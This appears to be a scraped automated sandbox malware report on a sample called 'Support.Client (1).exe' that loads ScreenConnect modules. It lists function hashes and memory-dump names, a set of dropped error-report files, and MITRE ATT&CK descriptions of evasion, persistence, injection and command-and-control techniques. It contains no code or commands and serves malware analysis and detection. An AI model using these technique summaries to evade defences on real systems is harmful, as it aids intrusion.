Instruction Fuzzy Hash: 37F0E510F1887D0BF768A76868293BD72C1FF8A718F5250BED41EC22DADD191D8646C2

Function 00007FFD9BBB3C89 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0172da2e69b7f6e58bc1eb4bcad018223176bc2004e374ebec9f85e8de654768
Instruction ID: f295a0ee6a93d2f078803a0cc6b74074e595a50ec7c46eab78c38fafe3a340e6
Opcode Fuzzy Hash: 0172da2e69b7f6e58bc1eb4bcad018223176bc2004e374ebec9f85e8de654768
Instruction Fuzzy Hash: 4BF06D3540D68C9FCB43EBA8D4608D67F70EE56320B0501DBE089CB462E7218A59CB82

Function 00007FFD9BBB07A1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95292d50e5d249d3b2277d807f783a0818cd5cfb21daa3b6044c2a4cfc180e1d
Instruction ID: dbf56687c5639124e593a1cdfdbe3df7c2102695efb31aa3b493180529fa9d23
Opcode Fuzzy Hash: 95292d50e5d249d3b2277d807f783a0818cd5cfb21daa3b6044c2a4cfc180e1d
Instruction Fuzzy Hash: 58E0926110F7D40FD752973584698E57FB0ED1321034900EBD5818F4B3E5158649CB41

Function 00007FFD9BBB7FFA Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f82f60e0463b3e3b95260ca83087835c41aca1ef388fc1c8bdd31e123993e6dd
Instruction ID: f800232934575827cac644aeb95d8936312adaf042892a37417529465b0a9e79
Opcode Fuzzy Hash: f82f60e0463b3e3b95260ca83087835c41aca1ef388fc1c8bdd31e123993e6dd
Instruction Fuzzy Hash: D4D05B12B56D2D0FDAA0E56C28A52F542C2E7D86A178601B3D80DC3295DC15ADC24380

Function 00007FFD9BBB4510 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de7ce79b4ed6f41420a29a07b7fcc768b69534f97234168c967087ed23f882c4
Instruction ID: fb63d320ea3d5b9388c36b55a6e54e2fa87f167d3a66bba3dd8a864668d650c5
Opcode Fuzzy Hash: de7ce79b4ed6f41420a29a07b7fcc768b69534f97234168c967087ed23f882c4
Instruction Fuzzy Hash: 6AE08C15E4EA2B02FB7C22A5B8B27BA6080BF05304F4A407E941AC10E9DD5C9E808562

Function 00007FFD9BBB2B14 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d651384dfde04b4369404b5831fab6cb0fd6d47b8cccd63ecdb392ad428048f
Instruction ID: a08a41d725483a92dc48abc22377ecd0f1429f0bbfa03e220fd9f0a998d651b4
Opcode Fuzzy Hash: 1d651384dfde04b4369404b5831fab6cb0fd6d47b8cccd63ecdb392ad428048f
Instruction Fuzzy Hash: 81C09B10F1A95E46F164EBE4D4716BE25527F8C704B564435D00EC21D6CD3C67015955

Analysis Process: ScreenConnect.WindowsClient.exePID: 7740, Parent PID: 7544COMMON

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	3

Executed Functions

Function 00007FFD9BB8958C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00007FFD9BB8957A

Memory Dump Source

Source File: 0000000D.00000002.2031085550.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 12b2bb1e7cc9c2511d10fa959916593203c7eb6e7f2bc3a7fbc014cdd1edb614
Instruction ID: 42b8d34a1a7eacc18fdbec088092862e826393f5dbdf5b4e910d79d72f42e5b6
Opcode Fuzzy Hash: 12b2bb1e7cc9c2511d10fa959916593203c7eb6e7f2bc3a7fbc014cdd1edb614
Instruction Fuzzy Hash: 52814C31A0EA8D4FEB75C6A888296B97FE0FF56314F0501BAD1DDC75E3DE2469068341

Function 00007FFD9B878014 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B878142

Memory Dump Source

Source File: 0000000D.00000002.2028705551.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 214aa30f163e4f844ad254ad7dd08374d64b16061b9586c37bda01ac30a39552
Instruction ID: e262aa0e30d97c1f88781fc151703b50025a78ebfdbde1dcea6e75fae65f9cff
Opcode Fuzzy Hash: 214aa30f163e4f844ad254ad7dd08374d64b16061b9586c37bda01ac30a39552
Instruction Fuzzy Hash: 38412831D0DB494FDB29AFA89C4A5E97BE0EF59310F04017FE049C3292DB78A9468B91

Function 00007FFD9B873AA2 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B878142

Memory Dump Source

Source File: 0000000D.00000002.2028705551.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: c07a17e83873d6989ef5a0377e03b5e3a8ba0c6e76e2faf2ad522122c959c698
Instruction ID: 1aaaa4419df4ffd5592ca908b5a602d0e8f5a913089580bfb99460d2d38ebbaa
Opcode Fuzzy Hash: c07a17e83873d6989ef5a0377e03b5e3a8ba0c6e76e2faf2ad522122c959c698
Instruction Fuzzy Hash: 1921D731918B188FDB28AF9D9C4AAF97BE0EB59711F00412EE049D3251DB74B8468B91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Support.Client (1).exe

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Support.Client (_5a63c4432494455eb3628cc1cc7766c341e5_7de988b1_428b93ac-de12-495d-acb1-2501a9c756bd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3996.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F34.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F64.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FA1.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4119.tmp.txt

Windows Analysis Report
Support.Client (1).exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre